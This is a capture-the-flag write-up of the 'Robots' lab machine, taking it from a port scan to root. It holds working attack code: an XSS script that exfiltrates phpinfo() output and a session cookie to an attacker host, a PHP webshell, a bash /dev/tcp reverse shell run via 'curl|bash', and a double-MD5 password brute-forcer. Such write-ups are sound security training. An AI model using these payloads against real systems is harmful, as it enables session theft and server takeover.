Robots
A (small) tribute to I. Asimov.
Recon
We begin with an Nmap scan and discover three open ports: port 22 running SSH, and ports 80 and 9000 hosting web servers. The default script scan also reveals the entries in robots.txt.
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ nmap -p- robots.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-05 11:19 IST
Nmap scan report for robots.thm (10.10.110.224)
Host is up (0.15s latency).
Not shown: 65508 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9000/tcp open cslistener
Nmap done: 1 IP address (1 host up) scanned in 830.34 seconds
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ nmap -sC -sV -sT -p 22,80,9000 robots.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-05 11:43 IST
Nmap scan report for robots.thm (10.10.110.224)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.61
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.61 (Debian)
| http-robots.txt: 3 disallowed entries
|_/harming/humans /ignoring/human/orders /harm/to/self
9000/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.71 seconds
The robots.txt file reveals several interesting directories:
/harming/humans
/ignoring/human/orders
/harm/to/self
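For reference, the same entries can be pulled directly with curl:
curl -s http://robots.thm/robots.txt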
When we visit the index page of the site on port 80, we receive a 403 Forbidden response.

On port 9000, we're presented with the default Apache2 landing page.

We check the directories listed in robots.txt, but most return a 403 Forbidden error, except for /harm/to/self, which displays a login page.

We access the login page and note that it's a PHP-based form. Unfortunately, it provides no feedback upon submission, making it difficult to enumerate valid usernames.

We use feroxbuster to enumerate additional directories and PHP pages under /harm/to/self. Among the results, we find admin.php, but access is restricted without proper authorization.
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ feroxbuster -u 'http://robots.thm/harm/to/self' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -x php
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher                    ver: 2.10.3
───────────────────────────┬──────────────────────
 Target Url                │ http://robots.thm/harm/to/self
 Threads                   │ 50
 Wordlist                  │ /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 Status Codes              │ All Status Codes!
 Timeout (secs)            │ 7
 User-Agent                │ feroxbuster/2.10.3
 Config File               │ /etc/feroxbuster/ferox-config.toml
 Extract Links             │ true
 Extensions                │ [php]
 HTTP methods              │ [GET]
 Recursion Depth           │ 4
 New Version Available     │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 272c http://robots.thm/harm/to/harming/
404 GET 9l 31w 272c http://robots.thm/harm/to/ignoring/
404 GET 9l 31w 272c http://robots.thm/harm/to/harming/humans
404 GET 9l 31w 272c http://robots.thm/harm/to/harm/to/self
404 GET 9l 31w 272c http://robots.thm/harm/to/ignoring/human/
404 GET 9l 31w 272c http://robots.thm/harm/to/ignoring/human/orders
404 GET 9l 31w 272c http://robots.thm/harm/to/harm/to/
404 GET 9l 31w 272c http://robots.thm/harm/to/harm/
403 GET 9l 28w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 315c http://robots.thm/harm/to/self => http://robots.thm/harm/to/self/
200 GET 427l 1133w 7797c http://robots.thm/harm/to/self/css/normalize.css
200 GET 418l 1043w 11452c http://robots.thm/harm/to/self/css/skeleton.css
200 GET 27l 31w 370c http://robots.thm/harm/to/self/admin.php
200 GET 0l 0w 0c http://robots.thm/harm/to/self/config.php
301 GET 9l 28w 319c http://robots.thm/harm/to/self/css => http://robots.thm/harm/to/self/css/
200 GET 38l 75w 976c http://robots.thm/harm/to/self/register.php
200 GET 36l 59w 795c http://robots.thm/harm/to/self/login.php
200 GET 34l 54w 662c http://robots.thm/harm/to/self/index.php
302 GET 0l 0w 0c http://robots.thm/harm/to/self/logout.php => index.php
[####################] - 3m 40981/40981 0s found:18 errors:0
[####################] - 2m 20477/20477 150/s http://robots.thm/harm/to/self/
[####################] - 2m 20477/20477 148/s http://robots.thm/harm/to/self/css/
We proceed to register a new user by providing a username and date of birth. The system informs us that the initial password is generated by taking the MD5 hash of the username concatenated with the day and month of the date of birth.

We calculate our hash with CyberChef and log in.
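The same value can also be computed locally; as a sketch, with a hypothetical username test and a date of birth on 01 January (DDMM = 0101), the initial password md5(username + DDMM) would be:
# Hypothetical example values: username "test", DOB 01/01 -> DDMM "0101"
echo -n 'test0101' | md5sum | cut -d' ' -f1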


After logging in, we're directed to the index page of /harm/to/self. Our username is reflected on the page, and we also notice indications of an Admin user. In the top-left corner, there's a link labeled Server Info.

Clicking the Server Info link reveals the phpinfo() page. We'll soon explain how this information can be highly useful for our purposes.

Initial Access
XSS via Username
Since the username is reflected on the page, we test for XSS by registering a user with a simple payload such as <script>alert("test");</script> as the username. After logging in, the payload executes successfully, and we receive our alert.

If the admin also interacts with the page and views the list of usernames, our XSS payload could execute in their browser. This would allow us to steal the admin's cookie, giving us access to their session and enabling interaction with admin.php, which we previously discovered during the feroxbuster scan.
Unfortunately, the HttpOnly flag is set on the cookie. This flag prevents JavaScript from accessing the cookie directly, making it accessible only through HTTP requests, specifically to protect against XSS-based cookie theft.

However, we have an alternative method to access the cookie, as demonstrated in the following article. As previously mentioned, the phpinfo() page could play a crucial role in this approach.
We can exploit the phpinfo() page to steal the cookie, leveraging the detailed request data it displays, such as headers and environment variables, when accessed with our crafted XSS payload.

We use a script from HackTricks to exploit this technique, hosting it on our own web server. The script makes the admin's browser request the phpinfo() page, so their session cookie is sent along and echoed back in the page, and the script then exfiltrates the page contents to our listener.
// Fetch the phpinfo() page in the admin's browser context (their session
// cookie is sent with the request and echoed back in the page contents),
// then POST the base64-encoded page to our listener.
async function exfil() {
    const response = await fetch('/harm/to/self/server_info.php');
    const text = await response.text();
    await fetch('http://10.17.15.155:1337/exfil', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded'
        },
        body: `data=${btoa(text)}`
    });
}

exfil();
After saving this script as xss.js and registering a user whose username is the payload <script src="http://10.17.15.155/xss.js"></script>, we observe the first indication of success: a request is made to our server to fetch the xss.js file, confirming that the XSS payload has been executed in the admin's browser.
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.110.224 - - [05/May/2025 16:45:25] "GET /xss.js HTTP/1.1" 200 -
10.17.15.155 - - [05/May/2025 16:45:28] "GET /xss.js HTTP/1.1" 200 -
10.17.15.155 - - [05/May/2025 16:45:29] "GET /xss.js HTTP/1.1" 200 -
10.10.110.224 - - [05/May/2025 16:46:25] "GET /xss.js HTTP/1.1" 304 -
Next, with our listener running on port 1337, we capture the exfiltrated phpinfo() contents, which include valuable details such as session cookies and other sensitive server information.
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.110.224] 51804
POST /exfil HTTP/1.1
Host: 10.17.15.155:1337
Connection: keep-alive
Content-Length: 99145
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/127.0.6533.119 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://robots.thm
Referer: http://robots.thm/
Accept-Encoding: gzip, deflate
data=PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FT
..........
We save the base64-encoded data parameter from the request body to a file and then decode it to extract the information, which might include the session cookie or other useful data.
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ base64 -d server_info_base64.php > server_info.html
By opening server_info.html in a browser, we confirm the captured PHPSESSID, which is the session ID of the admin, allowing us to hijack their session.

PHPSESSID=ign959419do8tqiqsleg9i5jed
Using the stolen PHPSESSID cookie, we modify our session cookie and navigate to http://robots.thm/harm/to/self/index.php.
We successfully log in as admin, but the dashboard appears unchanged, indicating that we may need to access more specific admin functionality, like admin.php, to see a difference.
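As a quick sanity check, the hijacked session can also be replayed from the command line with curl, using the PHPSESSID captured above:
curl -s -b 'PHPSESSID=ign959419do8tqiqsleg9i5jed' http://robots.thm/harm/to/self/index.php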

Remote File Inclusion
During our feroxbuster scan, we discovered admin.php. Let's try accessing it now to see if it reveals any admin-specific functionality or content.
When navigating to http://robots.thm/harm/to/self/admin.php, we encounter a form that allows us to submit URLs, likely for admin-related functionality.

To test the form, we submit a URL pointing to our own web server (http://10.17.15.155/test), observing how the system handles external requests.
We successfully observe a request being made to our server, confirming that the submitted URL is being fetched, likely server-side, by the admin interface.
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.110.224 - - [05/May/2025 17:02:56] code 404, message File not found
10.10.110.224 - - [05/May/2025 17:02:56] "GET /test HTTP/1.1" 404 -
10.10.110.224 - - [05/May/2025 17:03:27] "GET /xss.js HTTP/1.1" 304 -
10.10.110.224 - - [05/May/2025 17:03:58] code 404, message File not found
10.10.110.224 - - [05/May/2025 17:03:58] "GET /test HTTP/1.1" 404 -
The admin.php page returns an error message indicating that our submitted URL was passed to the include() function, strongly suggesting a Remote File Inclusion (RFI) vulnerability.

Since Remote File Inclusion (RFI) is possible, we host a simple webshell on our server to be included and executed by the target when we submit its URL.
echo '<?php system($_REQUEST["cmd"]); ?>' > cmd.php
We submit the URL of our webshell (http://10.17.15.155/cmd.php) to the admin.php form along with a command, such as cmd=id:
http://10.17.15.155/cmd.php&cmd=id
Shortly after, we observe a request to cmd.php on our server, confirming that the target has fetched and likely executed the webshell.
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.110.224 - - [05/May/2025 17:09:05] "GET /cmd.php?cmd=id HTTP/1.1" 200 -
And we can see the output of the command directly in the response.
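The same interaction can be scripted; this is only a sketch, since the name of the admin.php form field (assumed here to be url) and the request method should be checked against the actual form:
# Hypothetical sketch: form field name "url" and the POST method are assumptions;
# we reuse the hijacked admin session cookie captured earlier
curl -s -b 'PHPSESSID=ign959419do8tqiqsleg9i5jed' \
  --data-urlencode 'url=http://10.17.15.155/cmd.php&cmd=id' \
  http://robots.thm/harm/to/self/admin.php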

To gain an interactive shell, we prepare a reverse shell payload hosted on our web server, which the target will include and execute via the RFI vulnerability.
echo '/bin/bash -i >& /dev/tcp/10.17.15.155/1336 0>&1' > index.html
We then use the same RFI method to include our webshell and execute the command:
curl 10.17.15.155|bash

This fetches and runs our reverse shell script, establishing a connection back to our listener.
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ nc -lvnp 1336
listening on [any] 1336 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.110.224] 59048
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@robots:/var/www/html/harm/to/self$ script -qc /bin/bash /dev/null
script -qc /bin/bash /dev/null
www-data@robots:/var/www/html/harm/to/self$ ^Z
zsh: suspended nc -lvnp 1336
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ stty raw -echo; fg
[1] + continued nc -lvnp 1336
www-data@robots:/var/www/html/harm/to/self$ export TERM=xterm
www-data@robots:/var/www/html/harm/to/self$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@robots:/var/www/html/harm/to/self$
Shell as rgiskard
Discovering Database Configuration
While reviewing the application files, we discover the database configuration inside /var/www/html/harm/to/self/config.php, which may contain critical information such as database credentials and connection settings.
www-data@robots:/var/www/html/harm/to/self$ ls
admin.php css login.php register.php
config.php index.php logout.php server_info.php
www-data@robots:/var/www/html/harm/to/self$ cat config.php
<?php
$servername = "db";
$username = "robots";
$password = "q4qCz1OflKvKwK4S";
$dbname = "web";
// Get the current hostname
$currentHostname = $_SERVER['HTTP_HOST'];
// Define the desired hostname
$desiredHostname = 'robots.thm';
// Check if the current hostname does not match the desired hostname
if ($currentHostname !== $desiredHostname) {
// Redirect to the desired hostname
header("Location: http://$desiredHostname" . $_SERVER['REQUEST_URI']);
exit();
}
ini_set('session.cookie_httponly', 1);
session_start();
?>
www-data@robots:/var/www/html/harm/to/self$
Connecting to the Database
From the configuration, we learn that the database is running on the db host. Using the getent command, we can retrieve the IP address associated with the db host:
www-data@robots:/var/www/html/harm/to/self$ getent hosts db
172.18.0.2 db
Since the mysql client is not installed in the container, we can use chisel to set up port forwarding and connect to the database from our local machine.
Set up a chisel server on our local machine:
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ chisel server -p 7777 --reverse
2025/05/05 17:28:30 server: Reverse tunnelling enabled
2025/05/05 17:28:30 server: Fingerprint Sr37ry/TrThxyOehz2gwY08ITVlqRX22UJrw8e79jy8=
2025/05/05 17:28:30 server: Listening on http://0.0.0.0:7777
Next, we transfer chisel into the container using curl:
www-data@robots:/var/www/html/harm/to/self$ curl -s http://10.17.15.155/chisel -o /tmp/chisel
We forward the database port using chisel:
www-data@robots:/tmp$ chmod +x chisel
www-data@robots:/tmp$ ls -la
total 3812
drwxrwxrwt 1 root root 4096 May 5 12:00 .
drwxr-xr-x 1 root root 4096 Aug 19 2024 ..
-rwxr-xr-x 1 www-data www-data 3887104 May 5 12:01 chisel
-rw------- 1 www-data www-data 0 May 5 11:28 sess_71b563q2smmoftfeti6hrdlse4
-rw------- 1 www-data www-data 35 May 5 11:49 sess_ign959419do8tqiqsleg9i5jed
-rw------- 1 www-data www-data 81 May 5 11:26 sess_stb7agvvoq6u9okvd2l2ilrop8
www-data@robots:/tmp$ ./chisel client 10.17.15.155:7777 R:3306:172.18.0.2:3306
2025/05/05 12:37:51 client: Connecting to ws://10.17.15.155:7777
2025/05/05 12:37:52 client: Connected (Latency 145.973278ms)
With the database now accessible from our local machine, we can connect to it, list the tables, and extract the stored user password hashes.
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ mysql -u robots -pq4qCz1OflKvKwK4S -h 127.0.0.1 -D web
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1330
Server version: 11.5.2-MariaDB-ubu2404 mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [web]> show tables;
+---------------+
| Tables_in_web |
+---------------+
| logins |
| users |
+---------------+
2 rows in set (0.146 sec)
MariaDB [web]> select * from users;
+----+----------------------------------------------------+------------+---------+
| id | username | password | group |
+----+----------------------------------------------------+------------+---------+
| 1 | admin | [REDACTED] | admin |
| 2 | rgiskard | [REDACTED] | nologin |
| 3 | burning | [REDACTED] | guest |
| 4 | <script>alert("test");</script> | [REDACTED] | guest |
| 5 | <script src="http://10.17.15.155/xss.js"></script> | [REDACTED] | guest |
+----+----------------------------------------------------+------------+---------+
5 rows in set (0.145 sec)
MariaDB [web]>
Cracking the Hash
Now that we have the hash for the rgiskard user, we can try to crack it. From our earlier observations on the web server, we know that passwords follow the format md5(username + DDMM).
Reviewing login.php, we see that this value is hashed again with md5 before being compared to the database. Therefore, the hashes stored in the database follow the format md5(md5(username + DDMM)).
With this knowledge, we can write a Python script that brute-forces all possible day and month combinations (i.e., values from 0101 to 3112) for the date of birth, constructs md5(md5(username + DDMM)), and compares the result to the hash retrieved from the database.
import hashlib

# Replace this with the actual hash from the database (double MD5)
target_hash = "REPLACE_WITH_DB_HASH"
username = "rgiskard"

def md5(value):
    return hashlib.md5(value.encode()).hexdigest()

def double_md5(value):
    return hashlib.md5(md5(value).encode()).hexdigest()

for day in range(1, 32):
    for month in range(1, 13):
        ddmm = f"{day:02d}{month:02d}"
        raw_password = username + ddmm
        inner_hash = md5(raw_password)
        final_hash = double_md5(raw_password)
        if final_hash == target_hash:
            print(f"[+] Match found! DOB: {ddmm} | MD5(username+DOB): {inner_hash}")
            exit()

print("[-] No match found.")
Running the script, we successfully discover the password for the rgiskard user.

Shell as dolivaw
Although the plain password doesn't work, we can use the MD5-hashed password with SSH to gain shell access as the rgiskard user on the host.
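The value to type at the SSH password prompt is the inner hash printed by the script, i.e. md5("rgiskard" + DDMM). It can be reproduced on the command line (DDMM below is a placeholder for the recovered date of birth):
# DDMM is a placeholder for the date of birth found by the brute-force script
echo -n 'rgiskardDDMM' | md5sum | cut -d' ' -f1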
┌──(kali㉿kali)-[~/Desktop/THM/robots]
└─$ ssh rgiskard@robots.thm
The authenticity of host 'robots.thm (10.10.187.202)' can't be established.
ED25519 key fingerprint is SHA256:JpR2XY5mhYUXMxSyJMTsGb1IMrerkDpl7EB+rhuiTNU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'robots.thm' (ED25519) to the list of known hosts.
rgiskard@robots.thm's password:
rgiskard@ubuntu-jammy:~$ id
uid=1002(rgiskard) gid=1002(rgiskard) groups=1002(rgiskard)
rgiskard@ubuntu-jammy:~$
After checking the rgiskard user's sudo privileges, we discover that they are allowed to run the /usr/bin/curl 127.0.0.1/* command as the dolivaw user.

From the sudo configuration, the first URL we pass to curl must be 127.0.0.1/, but curl accepts multiple URLs in a single command. Combining this with the file:// protocol, which curl also supports, we can simply read the user flag as follows:
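For example (assuming the user flag sits at the usual /home/dolivaw/user.txt):
# The first URL satisfies the sudo rule; the second uses file:// to read the flag
# (the flag path /home/dolivaw/user.txt is an assumption)
sudo -u dolivaw /usr/bin/curl 127.0.0.1/ file:///home/dolivaw/user.txt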

To get a shell as the dolivaw user, we can use curl's -o option to save the responses from the requests to files. This allows us to write our public SSH key to the user's authorized_keys file.
Here are the steps:
1. Generate a key pair (if you don't already have one):
ssh-keygen -t ed25519 -f id_ed25519
This creates id_ed25519 (private key) and id_ed25519.pub (public key).
2. Serve the public key from your web server. If you're using a simple HTTP server (for example, Python's http.server), navigate to the directory where id_ed25519.pub is located and start the server:
python3 -m http.server 8000
This serves the public key at http://<your-ip>:8000/id_ed25519.pub.
3. Use curl to fetch the public key and write it to the dolivaw user's authorized_keys file:
sudo -u dolivaw /usr/bin/curl 127.0.0.1/ http://10.17.15.155/id_ed25519.pub -o /tmp/1 -o /home/dolivaw/.ssh/authorized_keys
Ensure that the /home/dolivaw/.ssh/ directory exists and has the correct permissions (you might need to create it first).
4. SSH in as the dolivaw user using the private key (id_ed25519):
ssh -i id_ed25519 dolivaw@robots.thm
This gives us a shell as the dolivaw user via the SSH key we added to the authorized_keys file.

Privilege Escalation
After checking the sudo privileges for the dolivaw user, we discover that they are allowed to run /usr/sbin/apache2 as the root user. This gives us the ability to control and configure the Apache2 server.

There are several ways we can leverage Apache2 to either read the root flag or gain a root shell.
The simplest method, described below, lets us read the root flag directly.
Apache2 lets us specify directives either through configuration files or command-line arguments. We can make use of the Include directive, which pulls in additional configuration files. Here's the key point: if we include a file that doesn't contain valid directives, Apache2 simply prints an error along with the offending contents of the included file.
We can exploit this behavior by including the root flag: since it obviously won't contain valid directives, Apache2 will output its contents as part of the error message.

As we can see, when attempting this, we first encounter an error because APACHE_RUN_DIR is not defined. This isn't an issue, as we can define it using another directive. Once we do, our file is included and Apache2 prints the contents of the root flag in its error output.
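A sketch of the two invocations (the root flag path /root/root.txt is an assumption; -C processes a directive before the configuration is read, -c afterwards):
# First attempt fails while parsing the default config: APACHE_RUN_DIR is not defined
sudo /usr/sbin/apache2 -c "Include /root/root.txt"
# Define APACHE_RUN_DIR up front, then include the flag; the resulting
# syntax error echoes the file's contents
sudo /usr/sbin/apache2 -C "Define APACHE_RUN_DIR /tmp" -c "Include /root/root.txt"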
